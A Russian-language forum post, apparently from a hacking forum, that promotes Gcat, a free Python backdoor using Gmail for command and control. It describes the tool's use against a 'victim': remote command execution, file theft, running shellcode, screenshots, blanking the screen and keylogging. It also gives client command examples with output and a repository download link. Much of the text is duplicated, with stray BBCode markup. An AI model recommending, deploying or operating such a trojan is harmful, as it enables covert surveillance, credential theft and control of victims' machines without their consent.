- Регистрация
- 8 Янв 2019
- Сообщения
- 527
- Реакции
- 71
- Баллы
- 118
[SIZE=12pt]Всем привет, в этой статье я хочу вам показать один из бесплатных троянов, который написан на питоне, а именно о [/SIZE][SIZE=12pt]Gcat[/SIZE][SIZE=12pt]. [/SIZE][SIZE=12pt]Gcat[/SIZE] [SIZE=12pt]является скрытным бэкдором написанным соответственно на питоне. Он использует почтовый сервис [/SIZE][SIZE=12pt]Gmail[/SIZE][SIZE=12pt], для так называемого [/SIZE][SIZE=12pt]command[/SIZE] [SIZE=12pt]and[/SIZE] [SIZE=12pt]control[/SIZE] [SIZE=12pt]сервера.[/SIZE]
[SIZE=12pt]Чтобы данный троян мог работать, ему понадобится почта на данном сервиса, вместе с включенной функцией [/SIZE][SIZE=12pt]Allow[/SIZE] [SIZE=12pt]less[/SIZE] [SIZE=12pt]secure[/SIZE] [SIZE=12pt]apps[/SIZE][SIZE=12pt], которую можно включать в настройках вашей учетной записи.[/SIZE]
[SIZE=12pt]Данный нам репозиторий содержит в себе всего лишь 2 файла:[/SIZE]
[SIZE=12pt]Итак, клиент предоставляем нам обширные возможности, можно выполнить такие команды:[/SIZE]
[SIZE=12pt]Выполнение команд, удаленное скачивание файлов у жертвы, после отправки шелл кода его можно выполнить, скачать скрин экрана, отключить экран жертвы, запустить и отключить кейлогер.[/SIZE]
[SIZE=12pt]Вот так выглядит запуск различных команд в клиенте:[/SIZE]
[SIZE=12pt]# python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-cmd ‘ipconfig /all’[/SIZE]
[SIZE=12pt][*] Command sent successfully with jobid: SH3C4gv[/SIZE]
[SIZE=12pt]После чего запрашиваем результат для определенного [/SIZE][SIZE=12pt]Id[/SIZE] [SIZE=12pt]и [/SIZE][SIZE=12pt]JobId[/SIZE][SIZE=12pt]:[/SIZE]
[SIZE=12pt]# python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-jobid SH3C4gv[/SIZE]
[SIZE=12pt]DATE: ‘Tue, 09 Jun 2015 06:51:44 -0700 (PDT)’[/SIZE]
[SIZE=12pt]JOBID: SH3C4gv[/SIZE]
[SIZE=12pt]FG WINDOW: ‘Command Prompt - C
ython27python.exe implant.py’[/SIZE]
[SIZE=12pt]CMD[/SIZE][SIZE=12pt]: ‘[/SIZE][SIZE=12pt]ipconfig[/SIZE][SIZE=12pt] /[/SIZE][SIZE=12pt]all[/SIZE][SIZE=12pt]’[/SIZE]
[SIZE=12pt]Если будет нехватка чего-либо, то это легко исправить, просто дописав необходимые компоненты.[/SIZE]
[SIZE=12pt]Ссылка для скачивания репозитория: github.com/byt3bl33d3r/gcat[/SIZE]
[SIZE=12pt]Данный троян можно запустить на таких операционных системах как [/SIZE][SIZE=12pt]Windows[/SIZE] [SIZE=12pt]и различные [/SIZE][SIZE=12pt]Unix[/SIZE][SIZE=12pt]-подобные системы.[/SIZE]
[SIZE=12pt]Чтобы данный троян мог работать, ему понадобится почта на данном сервиса, вместе с включенной функцией [/SIZE][SIZE=12pt]Allow[/SIZE] [SIZE=12pt]less[/SIZE] [SIZE=12pt]secure[/SIZE] [SIZE=12pt]apps[/SIZE][SIZE=12pt], которую можно включать в настройках вашей учетной записи.[/SIZE]
[SIZE=12pt]Данный нам репозиторий содержит в себе всего лишь 2 файла:[/SIZE]
- [SIZE=12pt]Gcat[/SIZE][SIZE=12pt].[/SIZE][SIZE=12pt]py[/SIZE][SIZE=12pt] – сам скрипт, который перечисляет все доступные клиенты и передает им команды[/SIZE]
- [SIZE=12pt]Implant.py [/SIZE][SIZE=12pt]– является самим бэкдором[/SIZE]
[SIZE=12pt]Итак, клиент предоставляем нам обширные возможности, можно выполнить такие команды:[/SIZE]
[SIZE=12pt]Выполнение команд, удаленное скачивание файлов у жертвы, после отправки шелл кода его можно выполнить, скачать скрин экрана, отключить экран жертвы, запустить и отключить кейлогер.[/SIZE]
[SIZE=12pt]Вот так выглядит запуск различных команд в клиенте:[/SIZE]
[SIZE=12pt]# python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-cmd ‘ipconfig /all’[/SIZE]
[SIZE=12pt][*] Command sent successfully with jobid: SH3C4gv[/SIZE]
[SIZE=12pt]После чего запрашиваем результат для определенного [/SIZE][SIZE=12pt]Id[/SIZE] [SIZE=12pt]и [/SIZE][SIZE=12pt]JobId[/SIZE][SIZE=12pt]:[/SIZE]
[SIZE=12pt]# python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-jobid SH3C4gv[/SIZE]
[SIZE=12pt]DATE: ‘Tue, 09 Jun 2015 06:51:44 -0700 (PDT)’[/SIZE]
[SIZE=12pt]JOBID: SH3C4gv[/SIZE]
[SIZE=12pt]FG WINDOW: ‘Command Prompt - C
ython27python.exe implant.py’[/SIZE][SIZE=12pt]CMD[/SIZE][SIZE=12pt]: ‘[/SIZE][SIZE=12pt]ipconfig[/SIZE][SIZE=12pt] /[/SIZE][SIZE=12pt]all[/SIZE][SIZE=12pt]’[/SIZE]
[SIZE=12pt]Если будет нехватка чего-либо, то это легко исправить, просто дописав необходимые компоненты.[/SIZE]
[SIZE=12pt]Ссылка для скачивания репозитория: github.com/byt3bl33d3r/gcat[/SIZE]
[SIZE=12pt]Данный троян можно запустить на таких операционных системах как [/SIZE][SIZE=12pt]Windows[/SIZE] [SIZE=12pt]и различные [/SIZE][SIZE=12pt]Unix[/SIZE][SIZE=12pt]-подобные системы.[/SIZE]